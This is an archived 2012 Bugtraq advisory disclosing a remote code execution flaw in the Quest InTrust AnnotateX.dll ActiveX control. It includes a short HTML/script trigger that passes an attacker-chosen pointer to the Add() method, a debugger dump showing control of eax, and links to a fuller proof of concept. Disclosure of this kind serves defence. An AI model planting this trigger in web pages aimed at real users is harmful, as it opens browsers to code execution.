lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 28 Mar 2012 17:30:06 GMT
From: nospam@...il.it
To: bugtraq@...urityfocus.com
Subject: Quest InTrust 10.4.x Annotation Objects ActiveX Control 
 AnnotateX.dll Uninitialized Pointer Remote Code Execution

Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution 


homepage: http://www.quest.com/intrust/

description: "InTrust securely collects, stores, reports and 
alerts on event log data from Windows, Unix and Linux systems, 
helping you comply with external regulations, internal policies 
and security best practices."


download url of a test version:
http://www.quest.com/downloads/

file tested: Quest_InTrust---Full-Package_104.zip


Background:

The mentioned product installs an ActiveX control
with the following settings:

binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

According to the IObjectSafety interface it is
safe for scripting and safe for initialization, so 
Internet Explorer will allow scripting of this control
from remote.

Vulnerability:

By invoking the Add() method is
possible to call inside a memory region of choice
set by the attacker through ex. heap spray or other
tecniques.

Example code:

<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' />
</object>
<script>
obj.Add(0x76767676,1);
</script>

..
eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244  call    dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=????????
..

You are in control of eax: fully exploitable.
As attachment, proof of concept code. 

original url: http://retrogod.altervista.org/9sg_quest_adv.htm

poc: http://retrogod.altervista.org/9sg_quest_poc.htm

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ